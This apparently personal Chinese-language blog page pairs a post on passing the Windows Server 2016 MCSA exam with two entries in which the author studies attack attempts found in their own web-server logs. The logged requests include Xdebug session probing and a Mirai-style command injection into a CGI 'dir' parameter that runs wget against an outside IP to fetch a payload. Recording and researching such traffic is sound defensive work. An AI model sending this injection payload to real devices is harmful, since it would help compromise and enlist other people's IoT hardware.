本想申請紙本證書, 可是現在只提供電子檔證書, 只能自己印了
2019年12月22日 星期日
取得Windows Server 2016 - MCSA
終於通過考試拿到 MCSA, 雖然說通過考試但還是有很多東西需要消化, (而且 Windows Server 2019 也出來了...😛)
本想申請紙本證書, 可是現在只提供電子檔證書, 只能自己印了
本想申請紙本證書, 可是現在只提供電子檔證書, 只能自己印了
2019年12月11日 星期三
從 Web Log 學習系統漏洞 53
185.153.196.97 - - [09/Dec/2019:18:57:16 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.153.196.97 - - [09/Dec/2019:23:22:09 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.153.196.97 - - [10/Dec/2019:18:25:17 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
這幾天同一個IP出現這個 XDEBUG_SESSION_START=phpstorm 的東西
查了一下這個 phpstorm 是個程式設計的編輯器
似乎可以利用它來做遠端指令攻擊或是竊取資料
不過我的網站沒有這個東西, 不曉得為什麼連到我網站時可以回傳正確回應
再觀察個幾天看看
2019年12月8日 星期日
從 Web Log 學習系統漏洞 52
最近比較少 phpmyadmin 攻擊, 常來的也是之前都看過的或是百度蟑螂, 今天倒是來了一個有趣的:
參考: New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
208.113.204.14 - - [08/Dec/2019:20:16:19 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"順著上面留的網址連過去, 發現了有趣的東西
208.113.204.14 - - [08/Dec/2019:20:16:23 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"
問了一下估狗大神之後, 這個東西大概是個針對物聯網設備來攻擊的變種病毒, 可以攻擊的東西還真多, 以現在許多電子產品都能連上網路的情況來看真的是很危險
參考: New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices